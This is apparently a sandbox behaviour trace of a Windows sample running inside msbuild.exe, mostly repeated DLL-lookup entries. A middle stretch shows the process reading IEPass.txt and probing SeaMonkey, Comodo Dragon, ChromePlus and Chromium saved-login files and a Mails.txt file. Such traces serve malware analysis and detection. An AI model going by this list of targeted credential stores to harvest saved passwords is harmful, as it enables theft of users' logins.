Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Unmap - True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, size = 4096, size_out = 389 True 1
Fn
Data
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, size = 4096, size_out = 0 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Comodo\Dragon\User Data\Default\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Chromium\User Data\Default\Login Data, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
